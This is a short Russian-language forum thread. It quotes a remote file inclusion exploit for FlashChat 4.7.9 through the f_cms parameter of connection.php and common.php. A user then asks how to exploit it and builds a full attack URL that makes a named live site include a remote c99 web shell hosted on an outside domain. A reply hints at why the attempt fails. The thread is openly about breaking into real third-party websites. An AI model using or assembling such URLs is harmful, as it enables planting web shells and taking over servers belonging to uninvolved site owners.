Script : FlashChat v4.7.9 Download : files.filefront.com/FlashChat+v479rar/;7192354;/fileinfo.html -------------------------- B.Files : connection.php >Require_once($f_cms); common.php > Require_once($f_cms); -------------------------- Exploits : http://www.example.com/chat/incclasses/connection.php?f_cms=[Shell-Attack] http://www.example.com/chat/inc/common.php?f_cms=[Shell-Attack] ------------------------- Как я понимаю вместо [Shell-Attack] нужно вставить ссылку на шелл и он должен загрузиться на сайт с установленным чатом, но ничего не получается((( объясните плиз что я неправильно делаю... и как этой уязвимостью пользоваться
ну допустим чат здесь: http://www.pesleague.com/forum/chat/flashchat.php шелл здесь: http://burny.fromru.com/c99madshell.php итоге получается http://www.pesleague.com/forum/chat/incclasses/connection.php?f_cms=http://burny.fromru.com/c99madshell.php и как я понял получившаяся ссылка должна запустить шелл на pc-center.com.ua... но ничего не получается или я все неправильно делаю и не так понял?
Nefix, а ты зайди по адресу h__p://www.pesleague.com/forum/chat/incclasses/connection.php и сам думаю догадаешься..